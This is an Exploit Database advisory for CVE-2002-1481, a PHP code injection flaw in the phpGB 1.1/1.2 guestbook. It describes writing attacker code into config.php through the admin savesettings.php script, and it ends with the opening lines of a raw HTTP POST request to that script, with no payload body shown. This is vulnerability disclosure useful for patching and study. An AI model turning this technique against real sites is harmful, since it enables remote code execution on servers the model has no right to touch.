phpGB 1.1/1.2 PHP Code Injection Vulnerability

ID EDB-ID:21783
Type exploitdb
Reporter ppp-design
Modified 2002-09-09T00:00:00


phpGB 1.1/1.2 PHP Code Injection Vulnerability. CVE-2002-1481. Webapps exploit for php platform


phpGB is subject to a PHP code injection vulnerability.

After bypassing authentication it is possible to inject code into the guestbook configuration file (config.php) by supplying malicious parameters for the savesettings.php script. The configuration file is referenced in most of the other guestbook scripts, so each time one of the scripts is accessed the attacker-supplied PHP code will be executed.

telnet 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n